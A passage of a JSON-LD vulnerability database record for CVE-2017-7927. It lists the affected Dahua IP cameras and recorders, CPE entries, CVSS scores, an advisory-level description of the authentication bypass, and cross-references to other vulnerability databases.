        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201705-3744",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-nvr1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-sd6cxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-sd6cxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-nvr1xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": null,
            "trust": 1.4,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": null
          },
          {
            "model": "dhi-hcvr58a32s-s2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dhi-hcvr51a08he-s3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dhi-hcvr51a04he-s3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-sd6cxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-nvr1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hfw1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw2xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdw1xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdbw23a0rn-zs",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-ipc-hdbw13a0sn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-hcvr5xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": "dh-hcvr4xxx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "dahuasecurity",
            "version": "0"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdbw23a0rn zs",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh nvr1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh hcvr4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh hcvr5xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr51a04he s3",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr51a08he s3",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dhi hcvr58a32s s2",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdbw13a0sn",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw2xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hdw4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw1xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw2xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh ipc hfw4xxx",
            "version": null
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "dh sd6cxx",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw23a0rn-zs:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdbw13a0sn_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdbw13a0sn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hdw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw2xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-ipc-hfw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6cxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6cxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-nvr1xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-nvr1xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ddh-hcvr4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-hcvr5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-hcvr5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a04he-s3_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a04he-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr51a08he-s3_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr51a08he-s3:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dhi-hcvr58a32s-s2_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr58a32s-s2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Bashis",
        "sources": [
          {
            "db": "BID",
            "id": "98312"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2017-7927",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2017-7927",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-06997",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "f9954bac-60c9-435b-9538-cebe46db3539",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-116130",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "LOW",
                "baseScore": 7.3,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 3.9,
                "impactScore": 3.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "Low",
                "baseScore": 7.3,
                "baseSeverity": "High",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2017-7927",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-7927",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-06997",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201704-1043",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "f9954bac-60c9-435b-9538-cebe46db3539",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-116130",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural Dahua The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua Technology Authentication is an access control reader produced by Dahua Technology. Dahua Technology Authentication has an authentication vulnerability. An attacker could exploit the vulnerability to gain unauthorized access to restricted content by bypassing expected security restrictions. Dahua DH-IPC-HDBW23A0RN-ZS, etc. are all camera products of Dahua Company in China. A security vulnerability exists in several Dahua products due to the program\u0027s use of password hashes instead of passwords to perform authentication. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-7927",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-17-124-02",
            "trust": 2.8
          },
          {
            "db": "BID",
            "id": "98312",
            "trust": 2.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU98841854",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "F9954BAC-60C9-435B-9538-CEBE46DB3539",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          },
          {
            "db": "BID",
            "id": "98312"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-003972"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-7927"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201704-1043"
          }
        ]
      },
      "id": "VAR-201705-3744",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "f9954bac-60c9-435b-9538-cebe46db3539"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-06997"
          },
          {
            "db": "VULHUB",
            "id": "VHN-116130"
          }
        ],
        "trust": 1.5166666600000003
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
